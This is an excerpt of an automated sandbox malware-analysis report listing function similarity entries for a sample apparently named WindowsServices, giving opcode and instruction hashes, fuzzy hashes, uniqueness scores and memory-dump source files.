• API ID:
• String ID:
• API String ID:
• Opcode ID: 80202f69e02f0e8970d978b97d2a90d0d0b70f7544695257d121ce75d8202c2b
• Instruction ID: 1d386670ed64e8463e79d880e83ab094246dc4ecc15bc2f6a8d3b4290b9821fe
• Opcode Fuzzy Hash: 80202f69e02f0e8970d978b97d2a90d0d0b70f7544695257d121ce75d8202c2b
• Instruction Fuzzy Hash: 10E092B66006044B9650DF0AFD45452F7D8EB84A30B18C07FDC0D8B711E276B508CAA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1919455777.0000000000E82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E82000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_e82000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fd94855a1d5feae1c10f0f95394c27de1980256bf9c50a9031d55d5c1a5aa40
• Instruction ID: 8cbe502c5bb4112953c76eb47b315f4fd31b38c99e38f9dbbdc4d0a588290214
• Opcode Fuzzy Hash: 9fd94855a1d5feae1c10f0f95394c27de1980256bf9c50a9031d55d5c1a5aa40
• Instruction Fuzzy Hash: F2D05E792056C14FD316AA1CD2A8F9537D4AB55718F4A44FEA8088B763C768D981E610
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1919455777.0000000000E82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E82000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_e82000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d94322273464de44eb3028af2894609cd3abc88933ab7923a45e25c18c94c690
• Instruction ID: 7525333311329abb23096691a7129edca9b32650b85ead0a930c4658500d368b
• Opcode Fuzzy Hash: d94322273464de44eb3028af2894609cd3abc88933ab7923a45e25c18c94c690
• Instruction Fuzzy Hash: 54D05E342006824BCB16EA1CD6E8F5937D4AB44718F0644ECBC148B762C7A8D9C0DA00
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81e9dfc51e8e25d46bc15fccdad26c2c7170806281f9f786d7ad296d834ea2a1
• Instruction ID: 6e38b892651cce857b6fc3535313779784102226a87e50c84f415e83dc7fe548
• Opcode Fuzzy Hash: 81e9dfc51e8e25d46bc15fccdad26c2c7170806281f9f786d7ad296d834ea2a1
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%